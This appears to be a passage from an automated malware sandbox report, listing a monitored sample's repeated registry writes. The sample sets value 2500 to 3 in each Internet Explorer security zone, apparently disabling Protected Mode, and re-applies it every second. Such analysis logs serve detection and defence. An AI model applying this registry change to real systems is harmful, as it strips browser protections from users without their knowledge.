| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
